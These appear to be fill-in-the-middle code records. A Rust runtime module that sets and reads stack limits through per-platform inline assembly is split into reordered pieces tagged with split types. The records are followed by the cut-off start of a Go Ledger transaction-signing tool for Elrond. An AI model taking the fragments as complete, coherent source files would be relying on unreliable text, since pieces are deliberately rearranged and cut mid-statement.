#[cfg(all(target_arch = "x86_64", target_os = "windows"))] #[inline(always)]
unsafe fn target_record_sp_limit(_: uint) {
}
#[cfg(all(target_arch = "x86_64", target_os = "freebsd"))] #[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movq $0, %fs:24" :: "r"(limit) :: "volatile")
}
#[cfg(all(target_arch = "x86_64", target_os = "dragonfly"))] #[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movq $0, %fs:32" :: "r"(limit) :: "volatile")
}
// x86
#[cfg(all(target_arch = "x86",
any(target_os = "macos", target_os = "ios")))]
#[inline(always)]
unsafe fn | (limit: uint) {
asm!("movl $$0x48+90*4, %eax
movl $0, %gs:(%eax)" :: "r"(limit) : "eax" : "volatile")
}
#[cfg(all(target_arch = "x86",
any(target_os = "linux", target_os = "freebsd")))]
#[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movl $0, %gs:48" :: "r"(limit) :: "volatile")
}
#[cfg(all(target_arch = "x86", target_os = "windows"))] #[inline(always)]
unsafe fn target_record_sp_limit(_: uint) {
}
// mips, arm - Some brave soul can port these to inline asm, but it's over
// my head personally
#[cfg(any(target_arch = "mips",
target_arch = "mipsel",
all(target_arch = "arm", not(target_os = "ios"))))]
#[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
use libc::c_void;
return record_sp_limit(limit as *const c_void);
extern {
fn record_sp_limit(limit: *const c_void);
}
}
// iOS segmented stack is disabled for now, see related notes
#[cfg(all(target_arch = "arm", target_os = "ios"))] #[inline(always)]
unsafe fn target_record_sp_limit(_: uint) {
}
}
/// The counterpart of the function above, this function will fetch the current
/// stack limit stored in TLS.
///
/// Note that all of these functions are meant to be exact counterparts of their
/// brethren above, except that the operands are reversed.
///
/// As with the setter, this function does not have a __morestack header and can
/// therefore be called in a "we're out of stack" situation.
#[inline(always)]
pub unsafe fn get_sp_limit() -> uint {
return target_get_sp_limit();
// x86-64
#[cfg(all(target_arch = "x86_64",
any(target_os = "macos", target_os = "ios")))]
#[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
let limit;
asm!("movq $$0x60+90*8, %rsi
movq %gs:(%rsi), $0" : "=r"(limit) :: "rsi" : "volatile");
return limit;
}
#[cfg(all(target_arch = "x86_64", target_os = "linux"))] #[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
let limit;
asm!("movq %fs:112, $0" : "=r"(limit) ::: "volatile");
return limit;
}
#[cfg(all(target_arch = "x86_64", target_os = "windows"))] #[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
return 1024;
}
#[cfg(all(target_arch = "x86_64", target_os = "freebsd"))] #[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
let limit;
asm!("movq %fs:24, $0" : "=r"(limit) ::: "volatile");
return limit;
}
#[cfg(all(target_arch = "x86_64", target_os = "dragonfly"))] #[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
let limit;
asm!("movq %fs:32, $0" : "=r"(limit) ::: "volatile");
return limit;
}
// x86
#[cfg(all(target_arch = "x86",
any(target_os = "macos", target_os = "ios")))]
#[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
let limit;
asm!("movl $$0x48+90*4, %eax
movl %gs:(%eax), $0" : "=r"(limit) :: "eax" : "volatile");
return limit;
}
#[cfg(all(target_arch = "x86",
any(target_os = "linux", target_os = "freebsd")))]
#[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
let limit;
asm!("movl %gs:48, $0" : "=r"(limit) ::: "volatile");
return limit;
}
#[cfg(all(target_arch = "x86", target_os = "windows"))] #[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
return 1024;
}
// mips, arm - Some brave soul can port these to inline asm, but it's over
// my head personally
#[cfg(any(target_arch = "mips",
target_arch = "mipsel",
all(target_arch = "arm", not(target_os = "ios"))))]
#[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
use libc::c_void;
return get_sp_limit() as uint;
extern {
fn get_sp_limit() -> *const c_void;
}
}
// iOS doesn't support segmented stacks yet. This function might
// be called by runtime though so it is unsafe to mark it as
// unreachable, let's return a fixed constant.
#[cfg(all(target_arch = "arm", target_os = "ios"))] #[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
1024
}
}
| target_record_sp_limit | identifier_name |
stack.rs | // Copied from:
// rust/src/librustrt/stack.rs
// git: 70cef9474a3307ec763efc01fe6969e542083823
// stack_exhausted() function deleted, no other changes.
// TODO replace with proper runtime-less native threading once Rust gains
// support for this.
// Copyright 2013 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
//! Rust stack-limit management
//!
//! Currently Rust uses a segmented-stack-like scheme in order to detect stack
//! overflow for rust tasks. In this scheme, the prologue of all functions are
//! preceded with a check to see whether the current stack limits are being
//! exceeded.
//!
//! This module provides the functionality necessary in order to manage these
//! stack limits (which are stored in platform-specific locations). The
//! functions here are used at the borders of the task lifetime in order to
//! manage these limits.
//!
//! This function is an unstable module because this scheme for stack overflow
//! detection is not guaranteed to continue in the future. Usage of this module
//! is discouraged unless absolutely necessary.
// iOS related notes
//
// It is possible to implement it using idea from
// http://www.opensource.apple.com/source/Libc/Libc-825.40.1/pthreads/pthread_machdep.h
//
// In short: _pthread_{get,set}_specific_direct allows extremely fast
// access, exactly what is required for segmented stack
// There is a pool of reserved slots for Apple internal use (0..119)
// First dynamic allocated pthread key starts with 257 (on iOS7)
// So using slot 149 should be pretty safe ASSUMING space is reserved
// for every key < first dynamic key
//
// There is also an opportunity to steal keys reserved for Garbage Collection
// ranges 80..89 and 110..119, especially considering the fact Garbage Collection
// never supposed to work on iOS. But as everybody knows it - there is a chance
// that those slots will be re-used, like it happened with key 95 (moved from
// JavaScriptCore to CoreText)
//
// Unfortunately Apple rejected patch to LLVM which generated
// corresponding prolog, decision was taken to disable segmented
// stack support on iOS.
pub const RED_ZONE: uint = 20 * 1024;
// Windows maintains a record of upper and lower stack bounds in the Thread Information
// Block (TIB), and some syscalls do check that addresses which are supposed to be in
// the stack, indeed lie between these two values.
// (See https://github.com/rust-lang/rust/issues/3445#issuecomment-26114839)
//
// When using Rust-managed stacks (libgreen), we must maintain these values accordingly.
// For OS-managed stacks (libnative), we let the OS manage them for us.
//
// On all other platforms both variants behave identically.
#[inline(always)]
pub unsafe fn record_os_managed_stack_bounds(stack_lo: uint, _stack_hi: uint) {
record_sp_limit(stack_lo + RED_ZONE);
}
#[inline(always)]
pub unsafe fn record_rust_managed_stack_bounds(stack_lo: uint, stack_hi: uint) |
/// Records the current limit of the stack as specified by `end`.
///
/// This is stored in an OS-dependent location, likely inside of the thread
/// local storage. The location that the limit is stored is a pre-ordained
/// location because it's where LLVM has emitted code to check.
///
/// Note that this cannot be called under normal circumstances. This function is
/// changing the stack limit, so upon returning any further function calls will
/// possibly be triggering the morestack logic if you're not careful.
///
/// Also note that this and all of the inside functions are all flagged as
/// "inline(always)" because they're messing around with the stack limits. This
/// would be unfortunate for the functions themselves to trigger a morestack
/// invocation (if they were an actual function call).
#[inline(always)]
pub unsafe fn record_sp_limit(limit: uint) {
return target_record_sp_limit(limit);
// x86-64
#[cfg(all(target_arch = "x86_64",
any(target_os = "macos", target_os = "ios")))]
#[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movq $$0x60+90*8, %rsi
movq $0, %gs:(%rsi)" :: "r"(limit) : "rsi" : "volatile")
}
#[cfg(all(target_arch = "x86_64", target_os = "linux"))] #[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movq $0, %fs:112" :: "r"(limit) :: "volatile")
}
#[cfg(all(target_arch = "x86_64", target_os = "windows"))] #[inline(always)]
unsafe fn target_record_sp_limit(_: uint) {
}
#[cfg(all(target_arch = "x86_64", target_os = "freebsd"))] #[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movq $0, %fs:24" :: "r"(limit) :: "volatile")
}
#[cfg(all(target_arch = "x86_64", target_os = "dragonfly"))] #[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movq $0, %fs:32" :: "r"(limit) :: "volatile")
}
// x86
#[cfg(all(target_arch = "x86",
any(target_os = "macos", target_os = "ios")))]
#[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movl $$0x48+90*4, %eax
movl $0, %gs:(%eax)" :: "r"(limit) : "eax" : "volatile")
}
#[cfg(all(target_arch = "x86",
any(target_os = "linux", target_os = "freebsd")))]
#[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movl $0, %gs:48" :: "r"(limit) :: "volatile")
}
#[cfg(all(target_arch = "x86", target_os = "windows"))] #[inline(always)]
unsafe fn target_record_sp_limit(_: uint) {
}
// mips, arm - Some brave soul can port these to inline asm, but it's over
// my head personally
#[cfg(any(target_arch = "mips",
target_arch = "mipsel",
all(target_arch = "arm", not(target_os = "ios"))))]
#[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
use libc::c_void;
return record_sp_limit(limit as *const c_void);
extern {
fn record_sp_limit(limit: *const c_void);
}
}
// iOS segmented stack is disabled for now, see related notes
#[cfg(all(target_arch = "arm", target_os = "ios"))] #[inline(always)]
unsafe fn target_record_sp_limit(_: uint) {
}
}
/// The counterpart of the function above, this function will fetch the current
/// stack limit stored in TLS.
///
/// Note that all of these functions are meant to be exact counterparts of their
/// brethren above, except that the operands are reversed.
///
/// As with the setter, this function does not have a __morestack header and can
/// therefore be called in a "we're out of stack" situation.
#[inline(always)]
pub unsafe fn get_sp_limit() -> uint {
return target_get_sp_limit();
// x86-64
#[cfg(all(target_arch = "x86_64",
any(target_os = "macos", target_os = "ios")))]
#[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
let limit;
asm!("movq $$0x60+90*8, %rsi
movq %gs:(%rsi), $0" : "=r"(limit) :: "rsi" : "volatile");
return limit;
}
#[cfg(all(target_arch = "x86_64", target_os = "linux"))] #[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
let limit;
asm!("movq %fs:112, $0" : "=r"(limit) ::: "volatile");
return limit;
}
#[cfg(all(target_arch = "x86_64", target_os = "windows"))] #[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
return 1024;
}
#[cfg(all(target_arch = "x86_64", target_os = "freebsd"))] #[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
let limit;
asm!("movq %fs:24, $0" : "=r"(limit) ::: "volatile");
return limit;
}
#[cfg(all(target_arch = "x86_64", target_os = "dragonfly"))] #[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
let limit;
asm!("movq %fs:32, $0" : "=r"(limit) ::: "volatile");
return limit;
}
// x86
#[cfg(all(target_arch = "x86",
any(target_os = "macos", target_os = "ios")))]
#[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
let limit;
asm!("movl $$0x48+90*4, %eax
movl %gs:(%eax), $0" : "=r"(limit) :: "eax" : "volatile");
return limit;
}
#[cfg(all(target_arch = "x86",
any(target_os = "linux", target_os = "freebsd")))]
#[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
let limit;
asm!("movl %gs:48, $0" : "=r"(limit) ::: "volatile");
return limit;
}
#[cfg(all(target_arch = "x86", target_os = "windows"))] #[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
return 1024;
}
// mips, arm - Some brave soul can port these to inline asm, but it's over
// my head personally
#[cfg(any(target_arch = "mips",
target_arch = "mipsel",
all(target_arch = "arm", not(target_os = "ios"))))]
#[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
use libc::c_void;
return get_sp_limit() as uint;
extern {
fn get_sp_limit() -> *const c_void;
}
}
// iOS doesn't support segmented stacks yet. This function might
// be called by runtime though so it is unsafe to mark it as
// unreachable, let's return a fixed constant.
#[cfg(all(target_arch = "arm", target_os = "ios"))] #[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
1024
}
}
| {
// When the old runtime had segmented stacks, it used a calculation that was
// "limit + RED_ZONE + FUDGE". The red zone was for things like dynamic
// symbol resolution, llvm function calls, etc. In theory this red zone
// value is 0, but it matters far less when we have gigantic stacks because
// we don't need to be so exact about our stack budget. The "fudge factor"
// was because LLVM doesn't emit a stack check for functions < 256 bytes in
// size. Again though, we have giant stacks, so we round all these
// calculations up to the nice round number of 20k.
record_sp_limit(stack_lo + RED_ZONE);
return target_record_stack_bounds(stack_lo, stack_hi);
#[cfg(not(windows))] #[inline(always)]
unsafe fn target_record_stack_bounds(_stack_lo: uint, _stack_hi: uint) {}
#[cfg(all(windows, target_arch = "x86"))] #[inline(always)]
unsafe fn target_record_stack_bounds(stack_lo: uint, stack_hi: uint) {
// stack range is at TIB: %fs:0x04 (top) and %fs:0x08 (bottom)
asm!("mov $0, %fs:0x04" :: "r"(stack_hi) :: "volatile");
asm!("mov $0, %fs:0x08" :: "r"(stack_lo) :: "volatile");
}
#[cfg(all(windows, target_arch = "x86_64"))] #[inline(always)]
unsafe fn target_record_stack_bounds(stack_lo: uint, stack_hi: uint) {
// stack range is at TIB: %gs:0x08 (top) and %gs:0x10 (bottom)
asm!("mov $0, %gs:0x08" :: "r"(stack_hi) :: "volatile");
asm!("mov $0, %gs:0x10" :: "r"(stack_lo) :: "volatile");
}
} | identifier_body |
stack.rs | // Copied from:
// rust/src/librustrt/stack.rs
// git: 70cef9474a3307ec763efc01fe6969e542083823
// stack_exhausted() function deleted, no other changes.
// TODO replace with proper runtime-less native threading once Rust gains
// support for this.
// Copyright 2013 The Rust Project Developers. See the COPYRIGHT
// file at the top-level directory of this distribution and at
// http://rust-lang.org/COPYRIGHT.
//
// Licensed under the Apache License, Version 2.0 <LICENSE-APACHE or
// http://www.apache.org/licenses/LICENSE-2.0> or the MIT license
// <LICENSE-MIT or http://opensource.org/licenses/MIT>, at your
// option. This file may not be copied, modified, or distributed
// except according to those terms.
//! Rust stack-limit management
//!
//! Currently Rust uses a segmented-stack-like scheme in order to detect stack
//! overflow for rust tasks. In this scheme, the prologue of all functions are
//! preceded with a check to see whether the current stack limits are being
//! exceeded.
//!
//! This module provides the functionality necessary in order to manage these
//! stack limits (which are stored in platform-specific locations). The
//! functions here are used at the borders of the task lifetime in order to
//! manage these limits.
//!
//! This function is an unstable module because this scheme for stack overflow
//! detection is not guaranteed to continue in the future. Usage of this module
//! is discouraged unless absolutely necessary.
// iOS related notes
//
// It is possible to implement it using idea from
// http://www.opensource.apple.com/source/Libc/Libc-825.40.1/pthreads/pthread_machdep.h
//
// In short: _pthread_{get,set}_specific_direct allows extremely fast
// access, exactly what is required for segmented stack
// There is a pool of reserved slots for Apple internal use (0..119)
// First dynamic allocated pthread key starts with 257 (on iOS7)
// So using slot 149 should be pretty safe ASSUMING space is reserved
// for every key < first dynamic key
//
// There is also an opportunity to steal keys reserved for Garbage Collection
// ranges 80..89 and 110..119, especially considering the fact Garbage Collection
// never supposed to work on iOS. But as everybody knows it - there is a chance
// that those slots will be re-used, like it happened with key 95 (moved from
// JavaScriptCore to CoreText)
//
// Unfortunately Apple rejected patch to LLVM which generated
// corresponding prolog, decision was taken to disable segmented
// stack support on iOS.
pub const RED_ZONE: uint = 20 * 1024;
// Windows maintains a record of upper and lower stack bounds in the Thread Information
// Block (TIB), and some syscalls do check that addresses which are supposed to be in
// the stack, indeed lie between these two values.
// (See https://github.com/rust-lang/rust/issues/3445#issuecomment-26114839)
//
// When using Rust-managed stacks (libgreen), we must maintain these values accordingly.
// For OS-managed stacks (libnative), we let the OS manage them for us.
//
// On all other platforms both variants behave identically.
#[inline(always)]
pub unsafe fn record_os_managed_stack_bounds(stack_lo: uint, _stack_hi: uint) {
record_sp_limit(stack_lo + RED_ZONE);
}
#[inline(always)]
pub unsafe fn record_rust_managed_stack_bounds(stack_lo: uint, stack_hi: uint) {
// When the old runtime had segmented stacks, it used a calculation that was
// "limit + RED_ZONE + FUDGE". The red zone was for things like dynamic
// symbol resolution, llvm function calls, etc. In theory this red zone
// value is 0, but it matters far less when we have gigantic stacks because
// we don't need to be so exact about our stack budget. The "fudge factor"
// was because LLVM doesn't emit a stack check for functions < 256 bytes in
// size. Again though, we have giant stacks, so we round all these
// calculations up to the nice round number of 20k.
record_sp_limit(stack_lo + RED_ZONE);
return target_record_stack_bounds(stack_lo, stack_hi);
#[cfg(not(windows))] #[inline(always)]
unsafe fn target_record_stack_bounds(_stack_lo: uint, _stack_hi: uint) {}
#[cfg(all(windows, target_arch = "x86"))] #[inline(always)]
unsafe fn target_record_stack_bounds(stack_lo: uint, stack_hi: uint) {
// stack range is at TIB: %fs:0x04 (top) and %fs:0x08 (bottom)
asm!("mov $0, %fs:0x04" :: "r"(stack_hi) :: "volatile");
asm!("mov $0, %fs:0x08" :: "r"(stack_lo) :: "volatile");
}
#[cfg(all(windows, target_arch = "x86_64"))] #[inline(always)]
unsafe fn target_record_stack_bounds(stack_lo: uint, stack_hi: uint) {
// stack range is at TIB: %gs:0x08 (top) and %gs:0x10 (bottom)
asm!("mov $0, %gs:0x08" :: "r"(stack_hi) :: "volatile");
asm!("mov $0, %gs:0x10" :: "r"(stack_lo) :: "volatile");
}
}
/// Records the current limit of the stack as specified by `end`.
///
/// This is stored in an OS-dependent location, likely inside of the thread
/// local storage. The location that the limit is stored is a pre-ordained
/// location because it's where LLVM has emitted code to check.
///
/// Note that this cannot be called under normal circumstances. This function is
/// changing the stack limit, so upon returning any further function calls will
/// possibly be triggering the morestack logic if you're not careful.
///
/// Also note that this and all of the inside functions are all flagged as
/// "inline(always)" because they're messing around with the stack limits. This
/// would be unfortunate for the functions themselves to trigger a morestack
/// invocation (if they were an actual function call).
#[inline(always)]
pub unsafe fn record_sp_limit(limit: uint) {
return target_record_sp_limit(limit);
// x86-64
#[cfg(all(target_arch = "x86_64",
any(target_os = "macos", target_os = "ios")))]
#[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movq $$0x60+90*8, %rsi
movq $0, %gs:(%rsi)" :: "r"(limit) : "rsi" : "volatile")
}
#[cfg(all(target_arch = "x86_64", target_os = "linux"))] #[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movq $0, %fs:112" :: "r"(limit) :: "volatile")
}
#[cfg(all(target_arch = "x86_64", target_os = "windows"))] #[inline(always)]
unsafe fn target_record_sp_limit(_: uint) {
}
#[cfg(all(target_arch = "x86_64", target_os = "freebsd"))] #[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movq $0, %fs:24" :: "r"(limit) :: "volatile")
}
#[cfg(all(target_arch = "x86_64", target_os = "dragonfly"))] #[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movq $0, %fs:32" :: "r"(limit) :: "volatile")
}
// x86
#[cfg(all(target_arch = "x86",
any(target_os = "macos", target_os = "ios")))]
#[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
asm!("movl $$0x48+90*4, %eax | unsafe fn target_record_sp_limit(limit: uint) {
asm!("movl $0, %gs:48" :: "r"(limit) :: "volatile")
}
#[cfg(all(target_arch = "x86", target_os = "windows"))] #[inline(always)]
unsafe fn target_record_sp_limit(_: uint) {
}
// mips, arm - Some brave soul can port these to inline asm, but it's over
// my head personally
#[cfg(any(target_arch = "mips",
target_arch = "mipsel",
all(target_arch = "arm", not(target_os = "ios"))))]
#[inline(always)]
unsafe fn target_record_sp_limit(limit: uint) {
use libc::c_void;
return record_sp_limit(limit as *const c_void);
extern {
fn record_sp_limit(limit: *const c_void);
}
}
// iOS segmented stack is disabled for now, see related notes
#[cfg(all(target_arch = "arm", target_os = "ios"))] #[inline(always)]
unsafe fn target_record_sp_limit(_: uint) {
}
}
/// The counterpart of the function above, this function will fetch the current
/// stack limit stored in TLS.
///
/// Note that all of these functions are meant to be exact counterparts of their
/// brethren above, except that the operands are reversed.
///
/// As with the setter, this function does not have a __morestack header and can
/// therefore be called in a "we're out of stack" situation.
#[inline(always)]
pub unsafe fn get_sp_limit() -> uint {
return target_get_sp_limit();
// x86-64
#[cfg(all(target_arch = "x86_64",
any(target_os = "macos", target_os = "ios")))]
#[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
let limit;
asm!("movq $$0x60+90*8, %rsi
movq %gs:(%rsi), $0" : "=r"(limit) :: "rsi" : "volatile");
return limit;
}
#[cfg(all(target_arch = "x86_64", target_os = "linux"))] #[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
let limit;
asm!("movq %fs:112, $0" : "=r"(limit) ::: "volatile");
return limit;
}
#[cfg(all(target_arch = "x86_64", target_os = "windows"))] #[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
return 1024;
}
#[cfg(all(target_arch = "x86_64", target_os = "freebsd"))] #[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
let limit;
asm!("movq %fs:24, $0" : "=r"(limit) ::: "volatile");
return limit;
}
#[cfg(all(target_arch = "x86_64", target_os = "dragonfly"))] #[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
let limit;
asm!("movq %fs:32, $0" : "=r"(limit) ::: "volatile");
return limit;
}
// x86
#[cfg(all(target_arch = "x86",
any(target_os = "macos", target_os = "ios")))]
#[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
let limit;
asm!("movl $$0x48+90*4, %eax
movl %gs:(%eax), $0" : "=r"(limit) :: "eax" : "volatile");
return limit;
}
#[cfg(all(target_arch = "x86",
any(target_os = "linux", target_os = "freebsd")))]
#[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
let limit;
asm!("movl %gs:48, $0" : "=r"(limit) ::: "volatile");
return limit;
}
#[cfg(all(target_arch = "x86", target_os = "windows"))] #[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
return 1024;
}
// mips, arm - Some brave soul can port these to inline asm, but it's over
// my head personally
#[cfg(any(target_arch = "mips",
target_arch = "mipsel",
all(target_arch = "arm", not(target_os = "ios"))))]
#[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
use libc::c_void;
return get_sp_limit() as uint;
extern {
fn get_sp_limit() -> *const c_void;
}
}
// iOS doesn't support segmented stacks yet. This function might
// be called by runtime though so it is unsafe to mark it as
// unreachable, let's return a fixed constant.
#[cfg(all(target_arch = "arm", target_os = "ios"))] #[inline(always)]
unsafe fn target_get_sp_limit() -> uint {
1024
}
} | movl $0, %gs:(%eax)" :: "r"(limit) : "eax" : "volatile")
}
#[cfg(all(target_arch = "x86",
any(target_os = "linux", target_os = "freebsd")))]
#[inline(always)] | random_line_split |
main.go | package main
import (
"bufio"
"encoding/hex"
"encoding/json"
"errors"
"fmt"
"io/ioutil"
"log"
"math"
"math/big"
"net/http"
"os"
"strconv"
"strings"
"github.com/ElrondNetwork/ledger-elrond/testApp/ledger"
"github.com/btcsuite/btcutil/bech32"
)
const proxyHost string = "https://api.elrond.com" // https://api-testnet.elrond.com for testnet
const (
hrp = "erd"
mainnetId = "1"
)
var ticker = "eGLD"
var status = [...]string{"Disabled", "Enabled"}
var denomination *big.Float
const (
errOpenDevice = "couldn't open device"
errGetAppVersion = "couldn't get app version"
errGetConfig = "couldn't get configuration"
errSetAddress = "couldn't set account and address index"
errGetAddress = "couldn't get address"
errGetNetworkConfig = "couldn't get network config"
errGetBalanceAndNonce = "couldn't get address balance and nonce"
errEmptyAddress = "empty address"
errInvalidAddress = "invalid receiver address"
errInvalidAmount = "invalid eGLD amount"
errSigningTx = "signing error"
errSendingTx = "error sending tx"
errInvalidBalanceString = "invalid balance string"
errInvalidHRP = "invalid bech32 hrp"
errGetAddressShard = "getAddressShard error"
errGetAccountAndAddressIndexFromUser = "invalid account or address index provided by user"
)
type networkConfig struct {
Data struct {
Config struct {
ChainID string `json:"erd_chain_id"`
Denomination int `json:"erd_denomination"`
GasPerDataByte uint64 `json:"erd_gas_per_data_byte"`
LatestTagSoftwareVersion string `json:"erd_latest_tag_software_version"`
MetaConsensusGroupSize uint32 `json:"erd_meta_consensus_group_size"`
MinGasLimit uint64 `json:"erd_min_gas_limit"`
MinGasPrice uint64 `json:"erd_min_gas_price"`
MinTransactionVersion uint32 `json:"erd_min_transaction_version"`
NumMetachainNodes uint32 `json:"erd_num_metachain_nodes"`
NumNodesInShard uint32 `json:"erd_num_nodes_in_shard"`
NumShardsWithoutMeta uint32 `json:"erd_num_shards_without_meta"`
RoundDuration uint32 `json:"erd_round_duration"`
ShardConsensusGroupSize uint32 `json:"erd_shard_consensus_group_size"`
StartTime uint32 `json:"erd_start_time"`
} `json:"config"`
} `json:"data"`
}
type transaction struct {
Nonce uint64 `json:"nonce"`
Value string `json:"value"`
RcvAddr string `json:"receiver"`
SndAddr string `json:"sender"`
GasPrice uint64 `json:"gasPrice,omitempty"`
GasLimit uint64 `json:"gasLimit,omitempty"`
Data []byte `json:"data,omitempty"`
Signature string `json:"signature,omitempty"`
ChainID string `json:"chainID"`
Version uint32 `json:"version"`
}
type getAccountResponse struct {
Data struct {
Account struct {
Address string `json:"address"`
Nonce uint64 `json:"nonce"`
Balance string `json:"balance"`
} `json:"account"`
} `json:"data"`
}
// getSenderInfo returns the balance and nonce of an address
func getSenderInfo(address string) (*big.Int, uint64, error) {
req, err := http.NewRequest(http.MethodGet,
fmt.Sprintf("%s/address/%s", proxyHost, address), nil)
if err != nil {
return nil, 0, err
}
client := http.DefaultClient
resp, err := client.Do(req)
if err != nil {
return nil, 0, err
}
body, err := ioutil.ReadAll(resp.Body)
defer func() {
_ = resp.Body.Close()
}()
if err != nil {
return nil, 0, err
}
var accInfo getAccountResponse
err = json.Unmarshal(body, &accInfo)
if err != nil {
return nil, 0, err
}
balance, ok := big.NewInt(0).SetString(accInfo.Data.Account.Balance, 10)
if !ok {
return nil, 0, errors.New(errInvalidBalanceString)
}
return balance, accInfo.Data.Account.Nonce, nil
}
// getAddressShard returns the assigned shard of an address
func getAddressShard(bech32Address string, noOfShards uint32) (uint32, error) {
// convert sender from bech32 to hex pubkey
h, pubkeyBech32, err := bech32.Decode(bech32Address)
if err != nil {
return 0, err
}
if h != hrp {
return 0, errors.New(errInvalidHRP)
}
pubkey, err := bech32.ConvertBits(pubkeyBech32, 5, 8, false)
if err != nil {
return 0, err
}
address := hex.EncodeToString(pubkey)
n := math.Ceil(math.Log2(float64(noOfShards)))
var maskHigh, maskLow uint32 = (1 << uint(n)) - 1, (1 << uint(n-1)) - 1
addressBytes, err := hex.DecodeString(address)
if err != nil {
return 0, err
}
addr := uint32(addressBytes[len(addressBytes)-1])
shard := addr & maskHigh
if shard > noOfShards-1 {
shard = addr & maskLow
}
return shard, nil
}
// getNetworkConfig reads the network config from the proxy and returns a networkConfig object
func getNetworkConfig() (*networkConfig, error) {
req, err := http.NewRequest(http.MethodGet, fmt.Sprintf("%s/network/config", proxyHost), nil)
if err != nil {
return nil, err
}
client := http.DefaultClient
resp, err := client.Do(req)
if err != nil {
return nil, err
}
body, err := ioutil.ReadAll(resp.Body)
defer func() {
_ = resp.Body.Close()
}()
if err != nil {
return nil, err
}
netConfig := &networkConfig{}
err = json.Unmarshal(body, netConfig)
if err != nil {
return nil, err
}
return netConfig, nil
}
// getDeviceInfo retrieves various informations from Ledger
func getDeviceInfo(nanos *ledger.NanoS) error {
err := nanos.GetVersion()
if err != nil {
log.Println(errGetAppVersion)
return err
}
err = nanos.GetConfiguration()
if err != nil {
log.Println(errGetConfig)
return err
}
return nil
}
// getTxDataFromUser retrieves tx fields from user
func getTxDataFromUser(contractData uint8) (string, *big.Int, string, error) {
var err error
reader := bufio.NewReader(os.Stdin)
// read destination address
fmt.Print("Enter destination address: ")
strReceiverAddress, _ := reader.ReadString('\n')
if strReceiverAddress == "" {
log.Println(errEmptyAddress)
return "", nil, "", err
}
strReceiverAddress = strings.TrimSpace(strReceiverAddress)
_, _, err = bech32.Decode(strReceiverAddress)
if err != nil {
log.Println(errInvalidAddress)
return "", nil, "", err
}
// read amount
fmt.Printf("Amount of %s to send: ", ticker)
strAmount, _ := reader.ReadString('\n')
strAmount = strings.TrimSpace(strAmount)
bigFloatAmount, ok := big.NewFloat(0).SetPrec(0).SetString(strAmount)
if !ok {
log.Println(errInvalidAmount)
return "", nil, "", err
}
bigFloatAmount.Mul(bigFloatAmount, denomination)
bigIntAmount := new(big.Int)
bigFloatAmount.Int(bigIntAmount)
var data string
if contractData == 1 {
// read data field
fmt.Print("Data field: ")
data, _ = reader.ReadString('\n')
data = strings.TrimSpace(data)
}
return strReceiverAddress, bigIntAmount, data, nil
}
// signTransaction sends the tx to Ledger for user confirmation and signing
func signTransaction(tx *transaction, nanos *ledger.NanoS) error {
toSign, err := json.Marshal(tx)
if err != nil {
return err
}
fmt.Println("Signing transaction. Please confirm on your Ledger")
signature, err := nanos.SignTx(toSign)
if err != nil {
log.Println(errSigningTx)
return err
}
sigHex := hex.EncodeToString(signature)
tx.Signature = sigHex
return nil
}
// broadcastTransaction broadcasts the transaction in the network
func | (tx transaction) error {
jsonTx, _ := json.Marshal(&tx)
resp, err := http.Post(fmt.Sprintf("%s/transaction/send", proxyHost), "",
strings.NewReader(string(jsonTx)))
if err != nil {
log.Println(errSendingTx)
return err
}
body, err := ioutil.ReadAll(resp.Body)
defer func() {
_ = resp.Body.Close()
}()
if err != nil {
log.Println(errSendingTx)
return err
}
res := string(body)
fmt.Printf("Result: %s\n\r", res)
return nil
}
// getAccountAndAddressIndexFromUser retrieves the account and address index from user
func getAccountAndAddressIndexFromUser() (uint32, uint32, error) {
reader := bufio.NewReader(os.Stdin)
fmt.Print("Account: ")
strAccount, _ := reader.ReadString('\n')
strAccount = strings.TrimSpace(strAccount)
